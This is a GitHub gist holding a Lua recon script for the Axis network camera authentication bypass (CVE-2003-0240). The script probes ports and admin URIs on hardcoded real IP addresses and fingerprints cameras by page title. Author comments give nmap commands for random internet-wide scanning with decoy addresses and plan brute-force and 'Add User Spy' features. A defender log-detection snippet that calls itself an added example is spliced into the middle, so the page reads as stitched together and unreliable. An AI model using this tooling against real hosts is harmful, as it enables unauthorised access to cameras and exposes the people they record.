Last active
June 22, 2024 11:18
POC Request Axis Cam ( CVE: CVE-2003-0240 )
--[[
-- BY MrCl0wnLab & r00t-3xp10it
-- https://gist.github.com/MrCl0wnLab
axis-network-camera-http-authentication-bypass
https://www.coresecurity.com/content/axis-network-camera-http-authentication-bypass
CVE: CVE-2003-0240
Vulnerability Description:
An Axis Network Camera captures and transmits live images directly over an IP network
(e.g. LAN/intranet/Internet), enabling users to remotely view and/or manage the camera
from a Web browser on any computer. For more information see http://www.axis.com
After setting up the Axis Camera, the user is provided with Web-based Administration
Tools for configuring and managing the camera by accessing http://camera-ip/admin/admin.shtml,
which requires a username and password.
We have discovered the following security vulnerability: by accessing
http://camera-ip//admin/admin.shtml (notice the double slash) the authentication
for "admin" is bypassed and an attacker gains direct access to the configuration.
Using this vulnerability, an attacker can reset the root password, then enable
the telnet server by modifying configuration files, giving the attacker interactive
access to a Unix like command line, allowing her to execute arbitrary commands as root.
Vulnerable Packages:
. AXIS 2100 Network Camera versions 2.32 and previous
. AXIS 2110 Network Camera versions 2.32 and previous
. AXIS 2120 Network Camera versions 2.32 and previous
. AXIS 2130 PTZ Network Camera versions 2.32 and previous
. AXIS 2400 Video Server versions 2.32 and previous
. AXIS 2401 Video Server versions 2.32 and previous
. AXIS 2420 Network Camera versions 2.32 and previous
. AXIS 2460 Network DVR versions 3.00 and previous
. AXIS 250S Video Server versions 3.02 and previous
https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=21492
---------------------------------------------------
Axis Network Camera HTTP Authentication Bypass Vulnerability
Bugtraq ID: 7652
Class:      Access Validation Error
CVE:        CVE-2003-0240
Remote:     Yes
Local:      No
Published:  May 27 2003 12:00AM
Updated:    Jul 11 2009 10:06PM
TITLE LIST:
Axis 2420 Video Server 2.32
Axis 2420 Network Camera 2.32
Axis 2420 Network Camera 2.31
Axis 2420 Network Camera 2.30
Axis 2401 Video Server 2.32
Axis 2401 Video Server 2.31
Axis 2401 Video Server 2.30
Axis 2400 Video Server 2.32
Axis 2400 Video Server 2.31
Axis 2400 Video Server 2.30
Axis 2130 PTZ Network Camera 2.32
Axis 2130 PTZ Network Camera 2.31
Axis 2130 PTZ Network Camera 2.30
Axis 2120 Network Camera 2.32
Axis 2120 Network Camera 2.31
Axis 2120 Network Camera 2.30
Axis 2110 Network Camera 2.32
Axis 2110 Network Camera 2.31
Axis 2110 Network Camera 2.30
Axis 2100 Network Camera 2.32
Axis 2100 Network Camera 2.31
Axis 2100 Network Camera 2.30
Axis 2100 Network Camera 2.34
URI:
/admin/admin.shtml
https://www.securityfocus.com/bid/7652/info
---------------------------------------------------
]]--
-- DEPENDENCIES (lua libraries) --
local http = require("socket.http")
local string = require("string")
local os = require("os")
local ltn12 = require("ltn12")
local options = {header={}}
local title ,result,uri_list,green_color,by_module,f,uri,check,
yellow_color,white_color,error_color,reset_color,colors,ports,targetPort
uri = "http://216.99.115.136" --> test target 1
uri = "http://185.32.182.75" --> test target 2
uri = "http://www.google.com.br" --> test target 3
options['header']['User-Agent'] = "Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_4 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B350 Safari/8536.25" --> use iPhone,safari User-agent OR your own...
options['header']['Accept-Language'] = "en-GB,en;q=0.8,sv" --> use en-GB as attacker default install language
options['header']['Cache-Control'] = "no-store" --> Instruct webserver to not write it to disk (do not to cache it)
ports = { 80, 81, 82, 83, 84, 85, 86, 92, 8080, 8081, 8082, 8083, 8084, 48624, 55752,55754,55756 }
-- SET VALUES COLOR TERMINAL USE IN FUNCTION --
colors = {
  -- attributes
  reset = 0,
  clear = 0,
  bright = 1,
  dim = 2,
  underscore = 4,
  blink = 5,
  reverse = 7,
  hidden = 8,
  -- foreground
  black = 30,
  red = 31,
  green = 32,
  yellow = 33,
  blue = 34,
  magenta = 35,
  cyan = 36,
  white = 37,
  -- background
  onblack = 40,
  onred = 41,
  ongreen = 42,
  onyellow = 43,
  onblue = 44,
  onmagenta = 45,
  oncyan = 46,
  onwhite = 47,
}
-- FUNCTION SET COLOR TERMINAL --
local function makecolor(value)
  value = string.char(27) .. '[1;' .. tostring(value) .. 'm'
  return value
end
-- SET VALUES COLOR TERMINAL --
green_color = makecolor(colors.green)
white_color = makecolor(colors.white)
error_color = makecolor(colors.red)
reset_color = makecolor(colors.reset)
yellow_color = makecolor(colors.yellow)
-- COLORING MADE BY MODULE --
by_module = white_color.."MrCl0wnLab"..reset_color
uri_list = {
  -- URI AXIS
  "/indexFrame.shtml",
  "/view/viewer_index.shtml",
  "/view/index.shtml",
  "/view/view.shtml",
  "/ViewerFrame.shtml",
  "/MultiCameraFrame",
  "/view/index2.shtml",
  "/RecordFrame?",
  "/index.shtml",
  "/admin/admin.shtml",
  "/indexFrame.shtml",
  "/visitor_center/i-cam.html",
  "/webcam/view.shtml",
  "/webcam_code.php",
  "/stadscam/Live95j.asp",
  "/sub06/cam.php",
  "/CgiStart",
  "/cgi-bin/blank.php?strona="
}
-- FUNCTION REQUEST ARRAY URI --
function requestCam(uri,uri_list,header_op)
  local t = {}
  print(string.format("| %sFiles's:%s",yellow_color,reset_color))
  for i, intable in pairs(uri_list) do
    local body, statusCode, headers, statusText = http.request{
      url=uri..intable, sink = ltn12.sink.table(t)
    }
    if(statusCode == 200) then
      print(string.format("| [%s].....: %s%s", statusCode,uri,intable))
      -- RETURN ARRAY VALUES --
      return {http_body=table.concat(t),http_code=statusCode,http_header=headers,http_status=statusText,http_uri=uri..intable}
    else
      print(string.format("| [%s].....: %s%s",statusCode,uri,intable))
      t = {}
    end
  end
  print(string.format("|\n|\n| [ABORT]: %sNone Match (uri) has been found in AXISwebcam-recon db.%s\n|\n",error_color,reset_color))
  os.execute("sleep 1")
end
-- BANNER --
print("\n\tBY MrCl0wnLab")
print("\thttps://gist.github.com/MrCl0wnLab")
print("\tCheck: Axis Network Camera HTTP Authentication Bypass Vulnerability")
-- EXEC REQUESTS --
print(string.format("\n| %sPort's:%s", yellow_color,reset_color))
for p, port in pairs(ports) do
  targetPort = uri..":"..port
  print(string.format("| Testing...: %s%s",port,reset_color))
  -- TEST PORT REQUESTS --
  r,c,h = http.request(targetPort)
  if(c == 200) then
    print("|_")
    -- REQUEST FILES webcam --
    result = requestCam(targetPort,uri_list,options)
    break
  end
end
if(result~=nil) then
  -- PRINT HEADER HTTP --
  print(string.format("|_\n| %sHeader:%s",yellow_color,reset_color))
  for i, intable in pairs(result.http_header) do
    print(string.format("| [%s] => %s",i,intable))
  end
  -- GREP TITLE --
  title = string.match(result.http_body, "<[Tt][Ii][Tt][Ll][Ee][^>]*>([^<]*)</[Tt][Ii][Tt][Ll][Ee]>")
  print(string.format("|_\n| %sAXISwebcam-recon:%s",yellow_color,reset_color))
  print(string.format("| %sTitle:%s%s",yellow_color,title,reset_color))
  -- List {table} of HTTP TITLE tags -
  tbl = {"AXIS Video Server",
    "Network Camera TUCCAM1",
    "Network Camera NetworkCamera",
    "Network Camera Hwy285/cr43",
    "Network Camera Capitanía",
    "Live View / - AXIS",
    "Live view / - AXIS 205 version 4.03",
    "Live view / - AXIS 205 Network Camera version 4.05",
    "Live view / - AXIS 205 Network Camera version 4.05.1",
    "Live view / - AXIS 205 Network Camera version 4.04",
    "Live view - AXIS P5534-E Network Camera",
    "Live view - AXIS 213 PTZ Network Camera version 4.12",
    "Live view - AXIS 206M Network Camera version 4.11",
    "Live view - AXIS P1354 Network Camera",
    "Live view - AXIS P1344 Network Camera",
    "Live view - AXIS M1114 Network Camera",
    "Live view - AXIS M1103 Network Camera",
    "Live view - AXIS M1025 Network Camera",
    "Live view - AXIS 240Q Video Server",
    "Live view - AXIS 221 Network Camera",
    "Live view - AXIS 215 PTZ Network Camera",
    "Live view - AXIS 214 PTZ Network Camera",
    "Live view - AXIS 213 PTZ Network Camera",
    "Live view - AXIS 211 Network Camera",
    "Live view - AXIS 211 Network Camera version 4.11",
    "Live view - AXIS 211 Network Camera version 4.10",
    "AXIS V5914 PTZ Network Camera 5.75.1.11",
    "AXIS Q7401 Video Encoder 5.51.5.1",
    "AXIS Q6045-E Network Camera",
    "AXIS Q6045-E Mk II Network Camera",
    "AXIS Q6044-E Network Camera",
    "AXIS Q6042-E PTZ Dome Network Camera 5.70.1.4",
    "AXIS Q6034-E PTZ Dome Network Camera 5.41.4",
    "AXIS Q3505 Fixed Dome Network Camera 6.30.1.1",
    "AXIS Q1765-LE Network Camera 5.55.2.3",
    "AXIS Q1615 Network Camera",
    "AXIS P5635-E Mk II PTZ Dome Network Camera 8.40.2.2",
    "AXIS P5635-E Mk II Network Camera",
    "AXIS P5534 PTZ Dome Network Camera 5.51.5",
    "AXIS P5514 Network Camera",
    "AXIS P3354 Fixed Dome Network Camera 5.40.17",
    "AXIS P1435-LE Network Camera",
    "AXIS P1425-LE Network Camera",
    "AXIS P1365 Mk II Network Camera",
    "AXIS P1357 Network Camera",
    "AXIS P1354 Fixed Network Camera 6.50.3",
    "AXIS P1354 Fixed Network Camera 5.60.1",
    "AXIS P1353 Network Camera 6.50.2.3",
    "AXIS M5013 Network Camera",
    "AXIS M3026 Network Camera",
    "AXIS M3004 Network Camera 5.51.5.1",
    "AXIS M2025-LE Network Camera 8.50.1",
    "AXIS M1145-L Network Camera 6.50.3",
    "AXIS M1124 Network Camera",
    "AXIS F34 Network Camera 6.50.2.3",
    "AXIS 243Q(2) Blade 4.45",
    "Axis 2420 Video Server 2.32",
    "Axis 2420 Network Camera 2.32",
    "Axis 2420 Network Camera 2.31",
    "Axis 2420 Network Camera 2.30",
    "Axis 2401 Video Server 2.32",
    "Axis 2401 Video Server 2.31",
    "Axis 2401 Video Server 2.30",
    "AXIS 2400 Video Server",
    "Axis 2400 Video Server 2.32",
    "Axis 2400 Video Server 2.31",
    "Axis 2400 Video Server 2.30",
    "AXIS 214 PTZ Network Camera 4.49",
    "Axis 2130 PTZ Network Camera 2.32",
    "Axis 2130 PTZ Network Camera 2.31",
    "Axis 2130 PTZ Network Camera 2.30",
    "Axis 2120 Network Camera 2.34",
    "Axis 2120 Network Camera 2.32",
    "Axis 2120 Network Camera 2.31",
    "Axis 2120 Network Camera 2.30",
    "Axis 2110 Network Camera 2.32",
    "Axis 2110 Network Camera 2.31",
    "Axis 2110 Network Camera 2.30",
    "Axis 2100 Network Camera 2.34",
    "Axis 2100 Network Camera 2.32",
    "Axis 2100 Network Camera 2.31",
    "Axis 2100 Network Camera 2.30"}
  -- COUNT TOTAL ARRAY TITLE
  local count = { i=0 , t=0 }
  for i, intable in ipairs(tbl) do
    count.t = count.t+1
  end
  -- TEST TITLE --
  for i, intable in ipairs(tbl) do
    local validar = string.match(title, intable)
    if(title == intable) then
      print(string.format("|\n|\n| STATUS...: %sAXIS WEBCAM FOUND%s",green_color,reset_color))
      print(string.format("| TITLE...: %s%s%s",green_color,intable,reset_color))
      print(string.format("| WEBCAM ACCESS...: %s%s%s",green_color,result.http_uri,reset_color))
      print(string.format("| Module Author...: %s\n|\n",by_module))
      break --> break execution (loop) if a match string its found.
    else
      print(string.format("| [%s] TESTING...: %s",count.i,intable))
      os.execute("sleep 0.5")
      count.i = count.i+1
      if (count.i == count.t) then --> why ? Because its the number of TITLE tags present in the {table} list.
        return print(string.format("|\n|\n| STATUS...: %sNONE AXIS WEBCAM FOUND%s\n Module Author...: %s\n\n",error_color,reset_color,by_module))
      end
    end
  end
end
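For defenders, the advisory text quoted in the script header (the `//admin/admin.shtml` double slash) can be hunted for in web or proxy access logs. The following is an added example, not part of the gist or of the vendor advisory; it assumes Common Log Format lines and that the device matches the protected `/admin/` prefix against the raw request path, and it generalises from the double slash to dot segments and percent-encoding. The log lines are constructed samples.

```python
import posixpath
import re
from urllib.parse import unquote

PROTECTED_PREFIX = "/admin/"  # assumption: the prefix the device guards with HTTP auth

# Assumed log layout (Common Log Format): host ident user [time] "METHOD target PROTO" status size
CLF = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# Constructed sample lines using documentation address ranges.
SAMPLE_LOG = [
    '192.0.2.10 - root [27/May/2003:10:00:01 +0000] "GET /admin/admin.shtml HTTP/1.0" 200 5120',
    '198.51.100.7 - - [27/May/2003:10:00:05 +0000] "GET /admin/admin.shtml HTTP/1.0" 401 312',
    '198.51.100.7 - - [27/May/2003:10:00:06 +0000] "GET //admin/admin.shtml HTTP/1.0" 200 5120',
    '198.51.100.9 - - [27/May/2003:10:00:09 +0000] "GET /view/index.shtml HTTP/1.0" 200 2048',
    '198.51.100.9 - - [27/May/2003:10:01:00 +0000] "GET /./admin/admin.shtml?x=1 HTTP/1.0" 401 312',
]

def normalize(target):
    """Path as a file resolver would see it: decoded, no '//' and no dot segments."""
    path = unquote(target.split("?", 1)[0])
    trailing = path.endswith("/")
    norm = posixpath.normpath(re.sub(r"/{2,}", "/", path))
    return norm + "/" if trailing and norm != "/" else norm

def find_bypass_attempts(lines):
    """Flag requests whose raw path dodges the prefix while the normalized path hits it."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue
        host, user, _method, target, status = m.groups()
        raw = target.split("?", 1)[0]
        norm = normalize(target)
        # A prefix check on the raw string misses what the resolver actually serves.
        if norm.startswith(PROTECTED_PREFIX) and not raw.startswith(PROTECTED_PREFIX):
            hits.append({"client": host, "raw": raw, "normalized": norm,
                         # 200 with no authenticated user means the page was served
                         "served_unauthenticated": status == "200" and user == "-"})
    return hits

if __name__ == "__main__":
    for hit in find_bypass_attempts(SAMPLE_LOG):
        print(hit)
```

A hit with `served_unauthenticated` set is the case to triage first: the protected page was returned to a client that presented no credentials.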
Upcoming functions:
via the /admin/admin.shtml panel
- Check Version via: file CGI and header['server']
- Set IP range
- Save Vulns
- Set IP range x country
- Grep Users
- Add User Spy
- Grep Time Zone
- Grep Network - TCP/IP
- Return Geolocation ip
- Use the Shodan API, Select=axis
- Brute Force
Cleiton, while trying out nmap's -iR switch I ran into an execution error in our script ..
- Reproduction:
- nmap -sS -v -Pn -n -T4 -O -iR 500 -p 92,8080-8082 --open --reason --script=AXISwebcam-recon.nse -oN webcams_reports.txt
- When our script finds 'authentication logins' it cannot run the 'TITLE' search function against that host
- But it keeps running the whole function (uri search & title search) against the other targets found (not auth)..
- Final Notes: if we want to write an nse to brute-force http auth, we just need to look for the [401] error code ;)
SourceCode Update
r00t-3xp10it - AXISwebcam-recon.nse
screenshots
- Auth login found
- Running against multiple targets (auth target also in host table)
- running -iR nmap switch == More error codes (sourcecode update)
- I have also added a new user input option, modem=true, demonstrating how to capture http modem login pages.
Final Notes:
Version 1.9 is only available in my gist here; I didn't update my official repo with these changes.
- Try This:: WAN Random Search + Syn Ack + Decoy Ip addr
sudo nmap -sS -v -Pn -n -T5 -iR 700 -p 8080-8086 --open --script=http-headers.nse,AXISwebcam-recon.nse -D 65.49.82.3 -oN webcam_reports.txt
In this example you forgot to 'declare' the uri variable, which will be needed further on in the script.